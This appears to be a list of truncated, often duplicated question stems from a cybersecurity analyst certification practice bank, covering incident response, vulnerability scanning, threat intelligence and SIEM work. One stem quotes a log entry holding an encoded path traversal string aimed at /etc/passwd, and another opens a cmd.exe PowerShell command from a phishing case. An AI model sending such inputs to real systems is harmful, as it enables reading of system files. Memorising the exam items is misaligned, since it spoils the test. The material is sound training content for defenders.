- A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that r ...
- Which of the following would an organization use to develop a business continuity plan?
- A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for ...
- Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of re ...
- A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the followin ...
- An analyst investigated a website and produced the following: Which of the following syntaxes did the analyst use to discover the application versions on this v ...
- An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2ES2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been discove ...
- Which of the following can be used to learn more about TTPs used by cybercriminals?
- A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the ...
- A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptomi ...
- A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
- Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure e ...
- Which of the following is a nation-state actor least likely to be concerned with?
- A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
- Which of the following is a benefit of the Diamond Model of Intrusion Analysis?
- A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log source ...
- After an upgrade to a new EDR, a security analyst received reports that several endpoints were not communicating with the SaaS provider to receive critical thre ...
- A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst c ...
- Which of the following ensures that a team receives simulated threats to evaluate incident response performance and coordination?
- Which of the following risk management principles is accomplished by purchasing cyber insurance?
- A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mi ...
- An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events i ...
- A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Wh ...
- Which of the following describes the best reason for conducting a root cause analysis?
- Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hou ...
- Which of the following characteristics ensures the security of an automated information system is the most effective and economical?
- Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?
- A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network ...
- An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a r ...
- A security analyst wants to implement new monitoring controls in order to find abnormal account activity for traveling employees. Which of the following techniq ...
- Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
- Which of the following is the most important factor to ensure accurate incident response reporting?
- Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
- Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
- A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getconnection(database01, "alp ...
- An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Whi ...
- Which of the following is the first step that should be performed when establishing a disaster recovery plan?
- A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following w ...
- A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constrain ...
- Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an inciden ...
- A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the follo ...
- An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running ...
- Which of the following makes STIX and OpenIOC information readable by both humans and machines?
- The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the ...
- During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the a ...
- A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
- During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps sh ...
- A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other ti ...
- An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any imp ...
- The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase th ...
- Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the gen ...
- Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
- Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the gen ...
- Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
- An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies ...
- A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiali ...
- An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP a ...
- Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?
- An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gat ...
- Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?
- A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the sp ...
- Which of the following is the most appropriate action a security analyst to take to effectively identify the most security risks associated with a locally hoste ...
- Which of the following most accurately describes the Cyber Kill Chain methodology?
- Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the ...
- A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the sc ...
- An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from acces ...
- A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isol ...
- Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
- Which of the following best describes the goal of a tabletop exercise?
- A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a ...
- An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
- Which of the following is the best reason to implement an MOU?
- An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high vo ...
- Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
- A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following command ...
- Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
- The DevSecOps team is remediating a Server-Side Request Forgery (SSRF) issue on the company's public-facing website. Which of the following is the best mitigati ...
- A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: • DNS traffic while a tunneling session is active. • The mea ...
- Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
- Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrenc ...
- An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed. Which of the followi ...
- A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating syst ...
- The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch ...
- A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Wh ...
- The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities w ...
- A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclos ...
- A security analyst runs the following command: # nmap -T4 -F 192.168.30.30 Starting nmap 7.6 Host is up (0.13s latency) PORT STATE SERVICE 23/tcp open telnet 44 ...
- Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
- An analyst is reviewing a dashboard from the company’s SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events i ...
- After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management p ...
- The security analyst received the monthly vulnerability report. The following findings were included in the report: • Five of the systems only required a reboot ...
- An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more de ...
- While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the followi ...
- Which of the following actions would an analyst most likely perform after an incident has been investigated?
- A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions ...
- Which of the following would eliminate the need for different passwords for a variety of internal applications?
- A list of IOCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the foll ...
- A web application has a function to retrieve content from an internal URL. The security analyst wants to identify correctly formatted GET requests to 'https://1 ...
- A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The prox ...
- An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
- An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v ...
- After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fa ...
- A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes ...
- During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safe ...
- Which of the following statements best describes the MITRE ATT&CK framework?
- Which of the following responsibilities does the legal team have during an incident management event? (Select two).
- Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operatin ...
- A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
- Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a. ...
- An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company ...
- An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears tha ...
- Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?
- A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on ...
- A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a termin ...
- Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
- An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed ...
- An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancie ...
- A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
- A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MI ...
- A security analyst needs to develop a solution to protect a high-value asset from an exploit like a recent zero-day attack. Which of the following best describe ...
- The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
- Which of the following is the best authentication method to secure access to sensitive data?
- While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the ...
- An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. ...
- A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the ...
- During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most ...
- A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
- New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC man ...
- An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party tha ...
- A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the followin ...
- A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
- A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
- A systems administrator is reviewing after-hours traffic flows from data center servers and sees regular, outgoing HTTPS connections from one of the servers to ...
- There are several reports of sensitive information being disclosed via file-sharing services. The company would like to improve its security posture against thi ...
- A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
- A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ens ...
- Which of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant?
- A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the ...
- Which of the following is the best use of automation in cybersecurity?
- Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting ...
- Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastruct ...
- A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cy ...
- An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulne ...
- A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when pro ...
- The Chief Information Security Officer (CISO) wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which ...
- A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
- When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
- Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
- Which of the following risk management decisions should be considered after evaluating all other options?
- A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurr ...
- A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise works ...
- An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the followin ...
- An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the followin ...
- While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following sho ...
- An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action repo ...
- An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of ...
- Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal valid ...
- The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security t ...
- Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two).
- A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following sh ...
- An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in ...
- A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the foll ...
- A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to ht.tps://offce365password.acme.co. The si ...
- An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is ...
- A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to mini ...
- A vulnerability scan shows several vulnerabilities. At the same time, a zero-day vulnerability with a CVSS score of 10 has been identified on a web server. Whic ...
- When starting an investigation, which of the following must be done first?
- A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next st ...
- Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
- A Chief Information Security Officer wants to implement security by design, starting with identifying vulnerabilities, including SQL injection, RFI, XSS, etc. W ...
- A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the followi ...
- A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be re ...
- During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate t ...
- After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too hig ...
- After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too hig ...
- A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the followi ...
- A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source ...
- Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
- Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
- Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed). Which of the f ...
- Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed). Which of the f ...
- An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the contro ...
- Which of the following security operations tasks are ideal for automation?
- An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the contro ...
- Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
- Which of the following is a commonly used four-component framework to communicate threat actor behavior?
- Which of the following tools would work best to prevent the exposure of PII outside of an organization?
- A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following s ...
- During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
- A security manager reviews the permissions for the approved users of a shared folder and finds accounts that are not on the approved access list. While investig ...
- Which of the following is a commonly used four-component framework to communicate threat actor behavior?
- Which of the following tools would work best to prevent the exposure of PII outside of an organization?
- During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
- An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS: 3.1 ...
- The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat g ...
- Given the following CVSS string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:K/I:K/A:H. Which of the following attributes correctly describes this vulnerability?
- Which of the following does 'federation' most likely refer to within the context of identity and access management?
- A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Offi ...
- A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following i ...
- An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and t ...
- An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
- Which of the following tools would work best to prevent the exposure of PII outside of an organization?
- An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
- A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path tra ...
- A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likel ...
- A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is ...
- A company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of ...
- After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
- A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash sc ...
- An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizin ...
- Which of the following tools would work best to prevent the exposure of PII outside of an organization?
- An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
- After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
- The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch ...
- A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other ti ...
- Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
- The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase th ...
- An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from acces ...
- A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attac ...
- An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. Which of ...
- During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
- An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a r ...
- Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
- A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
- An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
- An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the ...
- Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
- A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the followi ...
- A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a termin ...
- Which of the following is the first step that should be performed when establishing a disaster recovery plan?
- A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
- A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. ...
- When starting an investigation, which of the following must be done first?
- An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
- Which of the following tools would work best to prevent the exposure of PII outside of an organization?
- Which of the following is a commonly used four-component framework to communicate threat actor behavior?
- A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the followin ...
- A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up ...
- Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
- A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of ...
- An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the f ...
- An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the f ...
- There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against thi ...
- Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?
- A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclos ...
- Which of the following would help to minimize human engagement and aid in process improvement in security operations?
- Which of the following would help to minimize human engagement and aid in process improvement in security operations?
- After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too hig ...
- The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best a ...
- An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which ...
- Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
- During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate t ...
- During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and ...
- A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a ...
- New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC man ...
- An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company ...
- An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action repo ...
- A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
- An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of ...
- During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
- A user reports a malware alert to the help desk. A technician verifies the alert, determines the workstation is classified as a low-severity device, and uses ne ...
- A development team recently released a new version of a public-facing website for testing prior to production. The development team is soliciting the help of va ...
- A security technician is testing a solution that will prevent outside entities from spoofing the company's email domain, which is comptia.org. The testing is su ...
- A security analyst who works in the SOC receives a new requirement to monitor for indicators of compromise. Which of the following is the first action the analy ...
- A company's threat team has been reviewing recent security incidents and looking for a common theme. The team discovered the incidents were caused by incorrect ...
- A product manager is working with an analyst to design a new application that will perform as a data analytics platform and will be accessible via a web browser ...
- A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a report with 2,450 pages. Which of the following would m ...
- An organization wants to move non-essential services into a cloud computing environment. The management team has a cost focus and would like to achieve a recove ...
- A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
- During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
- A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a ...
- Which of the following software assessment methods would be best for gathering data related to an application's availability during peak times?
- During an incident response procedure, a security analyst acquired the needed evidence from the hard drive of a compromised machine. Which of the following acti ...
- As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence ...
- A company creates digitally signed packages for its devices. Which of the following best describes the method by which the security packages are delivered to th ...
- As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence ...
- A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the company. The CISO has tasked a security analyst with fi ...
- A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is concerned wi ...
- A security analyst discovers the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can access it. ...
- A security analyst is supporting an embedded software team. Which of the following is the best recommendation to ensure proper error handling at runtime?
- A cybersecurity analyst is concerned about attacks that use advanced evasion techniques. Which of the following would best mitigate such attacks?
- Legacy medical equipment, which contains sensitive data, cannot be patched. Which of the following is the best solution to improve the equipment's security post ...
- A company's legal department is concerned that its incident response plan does not cover the countless ways security incidents can occur. The department has ask ...
- A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an endpoint device. The security analyst then identifies the f ...
- A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
- During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
- Which of the following ICS network protocols has no inherent security functions on TCP port 502?
- A security engineer is reviewing security products that identify malicious actions by users as part of a company's insider threat program. Which of the followin ...
- A security engineer is reviewing security products that identify malicious actions by users as part of a company's insider threat program. Which of the followin ...
- Members of the sales team are using email to send sensitive client lists with contact information to their personal accounts. The company's AUP and code of cond ...
- While observing several host machines, a security analyst notices a program is overwriting data to a buffer. Which of the following controls will best mitigate ...
- An organization announces that all employees will need to work remotely for an extended period of time. All employees will be provided with a laptop and support ...
- The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
- The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
- Which of the following is the greatest security concern regarding ICS?
- An organization implemented an extensive firewall access-control blocklist to prevent internal network ranges from communicating with a list of IP addresses of ...
- Which of the following describes the difference between intentional and unintentional insider threats?
- An organization wants to consolidate a number of security technologies throughout the organization and standardize a workflow for identifying security issues pr ...
- A new prototype for a company's flagship product was leaked on the internet. As a result, the management team has locked out all USB drives. Optical drive write ...
- An organization wants to consolidate a number of security technologies throughout the organization and standardize a workflow for identifying security issues pr ...
- The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
- A risk assessment concludes that the perimeter network has the highest potential for compromise by an attacker, and it is labeled as a critical risk environment ...
- A company is aiming to test a new incident response plan. The management team has made it clear that the initial test should have no impact on the environment. ...
- Which of the following is the best reason why organizations need operational security controls?
- A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: get connection (database01, "a ...
- A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The prox ...
- Which of the following is the most important factor to ensure accurate incident response reporting?
- A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is th ...
- An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the followin ...
- During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed ...
- A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the sc ...
- A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the ...
- A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the ...
- A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst c ...
- An organization wants to consolidate a number of security technologies throughout the organization and standardize a workflow for identifying security issues pr ...
- The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
- A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a report with 2,450 pages. Which of the following would m ...
- A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst c ...
- A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the ...
- After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management p ...
- After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management p ...
- Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a. ...
- Which of the following describes the best reason for conducting a root cause analysis?
- An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP a ...
- Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a. ...
- Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
- An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP a ...
- An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: • created the initial evidence ...
- A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating syst ...
- A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating syst ...
